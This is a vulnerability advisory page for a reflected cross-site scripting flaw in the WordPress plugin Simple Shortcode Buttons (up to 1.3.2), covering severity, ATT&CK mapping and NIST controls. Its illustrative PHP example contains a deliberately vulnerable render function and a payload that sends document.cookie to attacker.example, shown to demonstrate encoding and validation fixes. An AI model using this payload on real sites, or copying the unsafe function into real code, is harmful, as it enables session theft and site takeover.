CVE-2025-23449
Published: 22 January 2025
Summary
CVE-2025-23449 is a high-severity Cross-site Scripting (CWE-79) vulnerability. Its CVSS base score is 7.1 (High).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). Its exploit likelihood ranks at the 46.2nd percentile (below the median), and it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2025-23449 is an Improper Neutralization of Input During Web Page Generation vulnerability, classified as Reflected Cross-site Scripting (XSS) under CWE-79, in the WordPress plugin Simple Shortcode Buttons by davidpuc. It affects all versions of the plugin up to and including 1.3.2 (the advisory gives no lower bound).
The vulnerability carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L): reachable over the network with low attack complexity, no privileges required, but user interaction needed. A remote attacker crafts a link whose request parameter is reflected unencoded into a page the plugin generates, and sends it to a victim; whoever follows the link executes the attacker's JavaScript in their browser, in the origin of the WordPress site. The scope is changed (S:C) because the vulnerable component is the plugin on the server while the impact lands in the victim's browser session, which is why the practical target is a logged-in administrator: a script running in that session can act on the site with the administrator's privileges. The confidentiality, integrity and availability impacts are each rated low.
Mitigation details are available in the Patchstack advisory at https://patchstack.com/database/Wordpress/Plugin/simple-shortcode-buttons/vulnerability/wordpress-simple-shortcode-buttons-plugin-1-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-3187
Vulnerability details
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in davidpuc Simple shortcode buttons simple-shortcode-buttons allows Reflected XSS. This issue affects Simple shortcode buttons: from n/a through <= 1.3.2.
- CWE(s): CWE-79 (Improper Neutralization of Input During Web Page Generation)
Related Threats
MITRE ATT&CK Enterprise Techniques
- T1190 Exploit Public-Facing Application
- T1059.007 Command and Scripting Interpreter: JavaScript
Why these techniques?
The reflected XSS flaw sits in a public-facing WordPress plugin, so the initial access is exploitation of a public-facing application (T1190) via a crafted malicious link; the payload is arbitrary JavaScript executed in the victim's browser (T1059.007).
Affected Assets
- WordPress plugin Simple Shortcode Buttons (simple-shortcode-buttons) by davidpuc, all versions up to and including 1.3.2
Mitigating Controls (NIST 800-53 r5)
- SI-15 (Information Output Filtering): directly prevents reflected XSS by encoding untrusted data for the HTML context it is rendered into, before the plugin emits the generated page.
- SI-10 (Information Input Validation): enforces validation of the structure and content of request parameters, rejecting or normalising values that do not match what the plugin expects before they are processed.
- SI-2 (Flaw Remediation): requires timely remediation, in this case updating Simple Shortcode Buttons from any version up to 1.3.2 to a fixed release.
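The pattern behind the vulnerability described in the deeper analysis above, and the two controls (input validation and output encoding) from this list, shown side by side as an added example. This is illustrative code written for this page, not the Simple Shortcode Buttons plugin's source; the query-string parameter names (label, style), the function names and the attacker payload are all constructed assumptions. The encoding uses plain PHP htmlspecialchars() so it runs outside WordPress; inside a plugin the equivalent calls are esc_attr() and esc_html().

```php
<?php
// Added example, not the plugin's code. Parameter names, function names and
// the payload are hypothetical; they illustrate the class of bug, not its exact form.

// VULNERABLE: request values are interpolated straight into HTML, so a value
// carried in a crafted link is reflected unencoded into the generated page.
function render_button_unsafe(string $label, string $style): string
{
    return '<a class="btn btn-' . $style . '" title="' . $label . '">' . $label . '</a>';
}

// SI-10, input validation: allowlist a parameter that has a small fixed domain.
// Anything outside the allowlist falls back to a safe default instead of being echoed.
function validate_style(string $style): string
{
    $allowed = ['primary', 'secondary', 'danger'];
    return in_array($style, $allowed, true) ? $style : 'primary';
}

// SI-15, output filtering: encode free-text for the HTML context it lands in.
// ENT_QUOTES also encodes single quotes, which matters for single-quoted attributes.
function encode_for_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// HARDENED: validate the constrained value, encode the free-text one.
function render_button_safe(string $label, string $style): string
{
    $style = validate_style($style);
    $label = encode_for_html($label);
    return '<a class="btn btn-' . $style . '" title="' . $label . '">' . $label . '</a>';
}

// Constructed query string of the kind a reflected-XSS link would carry:
// the label closes the title attribute and the <a> tag, then injects a script.
$query = 'label=' . rawurlencode('"><script>fetch("https://attacker.example/?c="+document.cookie)</script>')
       . '&style=' . rawurlencode('primary" onmouseover="alert(1)');

parse_str($query, $params);
$label = (string) ($params['label'] ?? '');
$style = (string) ($params['style'] ?? '');

$unsafe = render_button_unsafe($label, $style);
$safe   = render_button_safe($label, $style);

// The unsafe output contains a live <script> element and an injected event handler;
// the safe output contains neither, because the angle brackets and quotes are encoded
// and the style value was replaced by the default.
echo "unsafe: ", $unsafe, PHP_EOL;
echo "safe:   ", $safe, PHP_EOL;
echo "unsafe has <script>: ", var_export(strpos($unsafe, '<script>') !== false, true), PHP_EOL;
echo "safe has <script>:   ", var_export(strpos($safe, '<script>') !== false, true), PHP_EOL;
echo "safe has onmouseover: ", var_export(strpos($safe, 'onmouseover') !== false, true), PHP_EOL;
```

Run it with `php example.php`. The two controls are complementary: validation alone would not help for the label, which legitimately can be arbitrary text, and encoding alone is the wrong tool for a value that ends up in a CSS class name, where an allowlist is both simpler and stricter. Encoding must match the context the value is written into; a value placed inside a JavaScript string or a URL needs a different encoder than htmlspecialchars().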